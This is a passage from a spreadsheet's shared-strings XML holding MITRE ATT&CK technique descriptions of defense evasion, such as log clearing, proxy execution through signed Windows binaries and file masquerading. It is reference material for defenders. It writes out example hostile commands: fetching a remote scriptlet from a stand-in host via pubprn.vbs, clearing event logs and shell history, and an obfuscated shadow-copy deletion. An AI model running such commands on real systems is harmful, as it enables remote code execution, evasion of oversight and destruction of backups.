Adversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).</t>
  </si>
  <si>
    <t xml:space="preserve">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Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: &lt;code&gt;chown&lt;/code&gt; (short for change owner), and &lt;code&gt;chmod&lt;/code&gt; (short for change mode).
Adversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).(Citation: 20 macOS Common Tools and Techniques) </t>
  </si>
  <si>
    <t>Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via &lt;code&gt;Cscript.exe&lt;/code&gt;. For example, the following code publishes a printer within the specified domain: &lt;code&gt;cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com&lt;/code&gt;.(Citation: pubprn)
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second &lt;code&gt;script:&lt;/code&gt; parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is &lt;code&gt;pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct&lt;/code&gt;. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), &lt;code&gt;PubPrn.vbs&lt;/code&gt; has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to &lt;code&gt;LDAP://&lt;/code&gt;, vice the &lt;code&gt;script:&lt;/code&gt; moniker which could be used to reference remote code via HTTP(S).</t>
  </si>
  <si>
    <t>In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
On Linux and macOS, these command histories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
Adversaries may delete their commands from these logs by manually clearing the history (&lt;code&gt;history -c&lt;/code&gt;) or deleting the bash history file &lt;code&gt;rm ~/.bash_history&lt;/code&gt;.  
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to clear command history data (&lt;code&gt;clear logging&lt;/code&gt; and/or &lt;code&gt;clear history&lt;/code&gt;).(Citation: US-CERT-TA18-106A)
On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the &lt;code&gt;PSReadLine&lt;/code&gt; module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.
The &lt;code&gt;PSReadLine&lt;/code&gt; command history tracks the commands used in all PowerShell sessions and writes them to a file (&lt;code&gt;$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt&lt;/code&gt; by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)
Adversaries may run the PowerShell command &lt;code&gt;Clear-History&lt;/code&gt; to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; file. Adversaries may also delete the &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)</t>
  </si>
  <si>
    <t>Adversaries may modify mail and mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails, email metadata, or logs generated by the application or operating system, such as export requests. 
Adversaries may manipulate emails and mailbox data to remove logs, artifacts, and metadata, such as evidence of [Phishing](https://attack.mitre.org/techniques/T1566)/[Internal Spearphishing](https://attack.mitre.org/techniques/T1534), [Email Collection](https://attack.mitre.org/techniques/T1114), [Mail Protocols](https://attack.mitre.org/techniques/T1071/003) for command and control, or email-based exfiltration such as [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). For example, to remove evidence on Exchange servers adversaries have used the &lt;code&gt;ExchangePowerShell&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001) module, including &lt;code&gt;Remove-MailboxExportRequest&lt;/code&gt; to remove evidence of mailbox exports.(Citation: Volexity SolarWinds)(Citation: ExchangePowerShell Module) On Linux and macOS, adversaries may also delete emails through a command line utility called &lt;code&gt;mail&lt;/code&gt;  or use [AppleScript](https://attack.mitre.org/techniques/T1059/002) to interact with APIs on macOS.(Citation: Cybereason Cobalt Kitty 2017)(Citation: mailx man page)
Adversaries may also remove emails and metadata/headers indicative of spam or suspicious activity (for example, through the use of organization-wide transport rules) to reduce the likelihood of malicious emails being detected by security products.(Citation: Microsoft OAuth Spam 2022)</t>
  </si>
  <si>
    <t>Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)
Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.(Citation: MSDN MSBuild)(Citation: Microsoft MSBuild Inline Tasks 2017) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the &lt;code&gt;/var/log/&lt;/code&gt; directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
* &lt;code&gt;/var/log/messages:&lt;/code&gt;: General and system-related messages
* &lt;code&gt;/var/log/secure&lt;/code&gt; or &lt;code&gt;/var/log/auth.log&lt;/code&gt;: Authentication logs
* &lt;code&gt;/var/log/utmp&lt;/code&gt; or &lt;code&gt;/var/log/wtmp&lt;/code&gt;: Login records
* &lt;code&gt;/var/log/kern.log&lt;/code&gt;: Kernel logs
* &lt;code&gt;/var/log/cron.log&lt;/code&gt;: Crond logs
* &lt;code&gt;/var/log/maillog&lt;/code&gt;: Mail server logs
* &lt;code&gt;/var/log/httpd/&lt;/code&gt;: Web server access and error logs
</t>
  </si>
  <si>
    <t>Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system and/or in application logs from behaviors that require network connections, such as [Remote Services](https://attack.mitre.org/techniques/T1021) or [External Remote Services](https://attack.mitre.org/techniques/T1133). Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries.
Network connection history may be stored in various locations. For example, RDP connection history may be stored in Windows Registry values under (Citation: Microsoft RDP Removal):
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers&lt;/code&gt;
Windows may also store information about recent RDP connections in files such as &lt;code&gt;C:\Users\\%username%\Documents\Default.rdp&lt;/code&gt; and `C:\Users\%username%\AppData\Local\Microsoft\Terminal
Server Client\Cache\`.(Citation: Moran RDPieces) Similarly, macOS and Linux hosts may store information highlighting connection history in system logs (such as those stored in `/Library/Logs` and/or `/var/log/`).(Citation: Apple Culprit Access)(Citation: FreeDesktop Journal)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)
Malicious network connections may also require changes to third-party applications or network configuration settings, such as [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004) or tampering to enable [Proxy](https://attack.mitre.org/techniques/T1090). Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis.</t>
  </si>
  <si>
    <t>Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)
In some instances, artifacts of persistence may also be removed once an adversary’s persistence is executed in order to prevent errors with the new instance of the malware.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. 
On Linux and macOS, command history is tracked in a file pointed to by the environment variable &lt;code&gt;HISTFILE&lt;/code&gt;. When a user logs off a system, this information is flushed to a file in the user's home directory called &lt;code&gt;~/.bash_history&lt;/code&gt;. The &lt;code&gt;HISTCONTROL&lt;/code&gt; environment variable keeps track of what should be saved by the &lt;code&gt;history&lt;/code&gt; command and eventually into the &lt;code&gt;~/.bash_history&lt;/code&gt; file when a user logs out. &lt;code&gt;HISTCONTROL&lt;/code&gt; does not exist by default on macOS, but can be set by the user and will be respected.
Adversaries may clear the history environment variable (&lt;code&gt;unset HISTFILE&lt;/code&gt;) or set the command history size to zero (&lt;code&gt;export HISTFILESIZE=0&lt;/code&gt;) to prevent logging of commands. Additionally, &lt;code&gt;HISTCONTROL&lt;/code&gt; can be configured to ignore commands that start with a space by simply setting it to "ignorespace". &lt;code&gt;HISTCONTROL&lt;/code&gt; can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands. 
On Windows systems, the &lt;code&gt;PSReadLine&lt;/code&gt; module tracks commands used in all PowerShell sessions and writes them to a file (&lt;code&gt;$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt&lt;/code&gt; by default). Adversaries may change where these logs are saved using &lt;code&gt;Set-PSReadLineOption -HistorySavePath {File Path}&lt;/code&gt;. This will cause &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command &lt;code&gt;Set-PSReadlineOption -HistorySaveStyle SaveNothing&lt;/code&gt;.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to disable historical command logging (e.g. &lt;code&gt;no logging&lt;/code&gt;).</t>
  </si>
  <si>
    <t>Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.
The event logs can be cleared with the following utility commands:
* &lt;code&gt;wevtutil cl system&lt;/code&gt;
* &lt;code&gt;wevtutil cl application&lt;/code&gt;
* &lt;code&gt;wevtutil cl security&lt;/code&gt;
These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001). For example, adversaries may use the PowerShell command &lt;code&gt;Remove-EventLog -LogName Security&lt;/code&gt; to delete the Security EventLog and after reboot, disable future logging. Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.(Citation: disable_win_evt_logging)</t>
  </si>
  <si>
    <t>Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the &lt;code&gt;net use \\system\share /delete&lt;/code&gt; command. (Citation: Technet Net Use)</t>
  </si>
  <si>
    <t>Adversaries may modify file time attributes to hide new or changes to existing files. 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[Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)</t>
  </si>
  <si>
    <t>Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.
Rather than or in addition to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), an adversary can spoof positive affirmations that security tools are continuing to function even after legitimate security tools have been disabled (e.g., [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)). An adversary can also present a “healthy” system status even after infection. This can be abused to enable further malicious activity by delaying defender responses.
For example, adversaries may show a fake Windows Security GUI and tray icon with a “healthy” system status after Windows Defender and other system tools have been disabled.(Citation: BlackBasta)</t>
  </si>
  <si>
    <t>Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)
For example, adversaries may abuse syntax that utilizes various symbols and escape characters (such as spacing,  `^`, `+`. `$`, and `%`) to make commands difficult to analyze while maintaining the same intended functionality.(Citation: RC PowerShell) Many languages support built-in obfuscation in the form of base64 or URL encoding.(Citation: Microsoft PowerShellB64) Adversaries may also manually implement command obfuscation via string splitting (`“Wor”+“d.Application”`), order and casing of characters (`rev &lt;&lt;&lt;'dwssap/cte/ tac'`), globing (`mkdir -p '/tmp/:&amp;$NiA'`), as well as various tricks involving passing strings through tokens/environment variables/input streams.(Citation: Bashfuscator Command Obfuscators)(Citation: FireEye Obfuscation June 2017)
Adversaries may also use tricks such as directory traversals to obfuscate references to the binary being invoked by a command (`C:\voi\pcw\..\..\Windows\tei\qs\k\..\..\..\system32\erool\..\wbem\wg\je\..\..\wmic.exe shadowcopy delete`).(Citation: Twitter Richard WMIC)
Tools such as &lt;code&gt;Invoke-Obfuscation&lt;/code&gt; and &lt;code&gt;Invoke-DOSfucation&lt;/code&gt; have also been used to obfuscate commands.(Citation: Invoke-DOSfuscation)(Citation: Invoke-Obfuscation)</t>
  </si>
  <si>
    <t>An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting(Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW)(Citation: Microsoft About Event Tracing 2018), by tampering settings that control the collection and flow of event telemetry.(Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).
For example, adversaries may modify the `File` value in &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security&lt;/code&gt; to hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately.(Citation: disable_win_evt_logging) 
ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) &lt;code&gt;Set-EtwTraceProvider&lt;/code&gt; cmdlet or by interfacing directly with the Registry to make alterations.
In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.
In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors (Citation: LemonDuck).</t>
  </si>
  <si>
    <t>Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)
A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)</t>
  </si>
  <si>
    <t>Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
Adversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.
Adversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/T1601) to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks)</t>
  </si>
  <si>
    <t>Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include &lt;code&gt;del&lt;/code&gt; on Windows and &lt;code&gt;rm&lt;/code&gt; or &lt;code&gt;unlink&lt;/code&gt; on Linux and macOS.</t>
  </si>
  <si>
    <t>Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)</t>
  </si>
  <si>
    <t>Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: &lt;code&gt;File.txt.exe&lt;/code&gt; may render in some views as just &lt;code&gt;File.txt&lt;/code&gt;). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system’s policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension) 
Adversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain [Initial Access](https://attack.mitre.org/tactics/TA0001) into a user’s system via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) then [User Execution](https://attack.mitre.org/techniques/T1204). For example, an executable file attachment named &lt;code&gt;Evil.txt.exe&lt;/code&gt; may display as &lt;code&gt;Evil.txt&lt;/code&gt; to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.(Citation: SOCPrime DoubleExtension)
Common file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.</t>
  </si>
  <si>
    <t>Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named &lt;code&gt;March 25 \u202Excod.scr&lt;/code&gt; will display as &lt;code&gt;March 25 rcs.docx&lt;/code&gt;. A JavaScript file named &lt;code&gt;photo_high_re\u202Egnp.js&lt;/code&gt; will be displayed as &lt;code&gt;photo_high_resj.png&lt;/code&gt;.(Citation: Infosecinstitute RTLO Technique)
Adversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. 
Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) </t>
  </si>
  <si>
    <t>Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: &lt;code&gt;C:\Windows\Microsoft.NET\Framework\v&lt;version&gt;\InstallUtil.exe&lt;/code&gt; and &lt;code&gt;C:\Windows\Microsoft.NET\Framework64\v&lt;version&gt;\InstallUtil.exe&lt;/code&gt;.
InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute &lt;code&gt;[System.ComponentModel.RunInstaller(true)]&lt;/code&gt;. (Citation: LOLBAS Installutil)</t>
  </si>
  <si>
    <t>Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console (MMC) is a binary that may be signed by Microsoft and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview)
For example, &lt;code&gt;mmc C:\Users\foo\admintools.msc /a&lt;/code&gt; will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is &lt;code&gt;mmc gpedit.msc&lt;/code&gt;, which will open the Group Policy Editor application window. 
Adversaries may use MMC commands to perform malicious tasks. For example, &lt;code&gt;mmc wbadmin.msc delete catalog -quiet&lt;/code&gt; deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: &lt;code&gt;wbadmin.msc&lt;/code&gt; may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal)
Adversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: &lt;code&gt;mmc.exe -Embedding C:\path\to\test.msc&lt;/code&gt;.(Citation: abusing_com_reg)</t>
  </si>
  <si>
    <t>Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the &lt;code&gt;AlwaysInstallElevated&lt;/code&gt; policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The Odbcconf.exe binary may be digitally signed by Microsoft.
Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a &lt;code&gt;REGSVR&lt;/code&gt; flag that can be misused to execute DLLs (ex: &lt;code&gt;odbcconf.exe /S /A &amp;lbrace;REGSVR "C:\Users\Public\file.dll"&amp;rbrace;&lt;/code&gt;). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) 
</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</si>
  <si>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&lt;code&gt;evil.bin&lt;/code&gt;, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to &lt;code&gt;evil.txt&lt;/code&gt;, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to &lt;code&gt;evil.txt &lt;/code&gt; (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).
Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.</t>
  </si>
  <si>
    <t>Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)</t>
  </si>
  <si>
    <t>Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename &lt;code&gt;rundll32.exe&lt;/code&gt;). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
Adversaries may also use the same icon of the file they are trying to mimic.</t>
  </si>
  <si>
    <t>Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.
Tasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t>Adversaries may masquerade malicious payloads as legitimate files through changes to the payload's formatting, including the file’s signature, extension, and contents. Various file types have a typical standard format, including how they are encoded and organized. For example, a file’s signature (also known as header or magic bytes) is the beginning bytes of a file and is often used to identify the file’s type. For example, the header of a JPEG file,  is &lt;code&gt; 0xFF 0xD8&lt;/code&gt; and the file extension is either `.JPE`, `.JPEG` or `.JPG`. 
Adversaries may edit the header’s hex code and/or the file extension of a malicious payload in order to bypass file validation checks and/or input sanitization. This behavior is commonly used when payload files are transferred (e.g., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and stored (e.g., [Upload Malware](https://attack.mitre.org/techniques/T1608/001)) so that adversaries may move their malware without triggering detections. 
